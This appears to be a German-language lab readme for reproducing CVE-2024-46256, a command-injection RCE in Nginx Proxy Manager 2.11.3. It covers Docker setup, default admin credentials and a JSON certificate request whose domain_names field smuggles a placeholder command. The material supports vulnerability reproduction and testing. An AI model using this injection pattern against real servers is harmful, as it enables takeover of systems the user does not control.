
CVE-2024-46256 Werkzeug
docker-compose up -d
Oder Sie können das automatische Skript verwenden:
python setup_environment.py
URL: http://localhost:81
Nach Abschluss der Ersteinrichtung den Test durchführen
Mit dem Standard-Administratorkonto anmelden (E-Mail: [email protected] / Passwort: changeme)
Zugriffsrechte für die Zertifikatsausstellungsfunktionen überprüfen
CVE ID: CVE-2024-46256
Produkt: Nginx Proxy Manager
Version: 2.11.3
Schwachstellentyp: Remote Code Execution (RCE)
CVSS: Hoch
Der PoC führt dazu, dass ein authentifizierter Benutzer während des Zertifikatsausstellungsprozesses (z.B. Let's Encrypt) im Feld für den Domainnamen eine Template-/Befehlsinjektion durchführt und so eine RCE auslöst.
Beispiel-Payload (konzeptionelles Beispiel):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
Betriebssystem: Windows 10
Docker: Aktuelle Version
Nginx Proxy Manager: 2.11.3